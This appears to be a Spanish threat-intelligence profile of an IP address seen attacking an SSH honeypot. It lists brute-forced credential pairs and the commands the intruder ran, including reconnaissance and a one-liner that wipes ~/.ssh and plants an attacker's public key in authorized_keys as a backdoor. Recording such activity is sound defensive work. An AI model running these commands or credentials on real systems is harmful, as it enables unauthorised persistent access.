TROYANOSYVIRUS
Amenaza ActivaALTO

160.242.45.113

Pais de Origen🇳🇦 NA
Primera Deteccion25/3/2026
Ultima Actividad8/4/2026
ISPParatus
🎯
560
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
26
Malware

Geolocalizacion

Pais
🇳🇦 NA
Ciudad
Windhoek
ASN
AS33763
ISP
Paratus

Tipos de Ataque

ssh_telnet_honeypot

Puertos Atacados

22

Malware Asociado

Credenciales Intentadas

🔐345gs5662d34/345gs5662d34
5x
🔐root/3245gs5662d34
3x
🔐deploy/d3ploy
1x
🔐root/Admin@9000
1x
🔐sambauser/sambauserpass
1x
🔐root/stop
1x
🔐root/wdkj@2025
1x
🔐root/Abcd12345!!
1x
🔐root/Lm123456
1x
🔐n8n/n8n
1x
🔐root/123qweqweQWE
1x
🔐steam/steam20
1x
🔐teamspeak/3245gs5662d34
1x
🔐oem/1234
1x
🔐root/Cq123456!
1x

Comandos Ejecutados

$cd ~; chattr -ia .ssh; lockr -ia .ssh5x
$lscpu | grep Model5x
$which ls5x
$uname5x
$whoami5x
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'5x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~5x
$lockr -ia .ssh5x
$top5x
$uname -m5x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos
443
Hostnames
flordek.3cx.sc
CPEs
cpe:/a:3cx:3cxcpe:/a:f5:nginx

Evaluacion de Riesgo

65
/100
BajoMedioAltoCritico